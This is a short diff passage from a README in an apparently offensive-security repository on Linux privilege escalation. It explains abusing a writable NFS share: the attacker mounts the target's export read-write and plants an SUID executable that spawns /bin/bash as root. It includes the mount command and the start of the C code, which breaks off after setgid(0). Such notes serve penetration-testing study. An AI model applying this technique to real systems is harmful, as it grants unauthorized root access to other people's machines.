Somchandra17/Privilege-Escalation-For-Linux/README.md

   - Then just mount the shared to your attack machine by 👉🏻 `mount -o rw {ip of target}:{mountable dir} /{dir of ur attack machine}`

-  - Just create a executable with SUID bit set in that folder which can run /bin/bash on the target system check this * for example
+  - Just create a executable with SUID bit set in that folder which can run /bin/bash on the target system check this [nfs.c](nfs.c) for example
 ```
 int main()
 {setgid(0);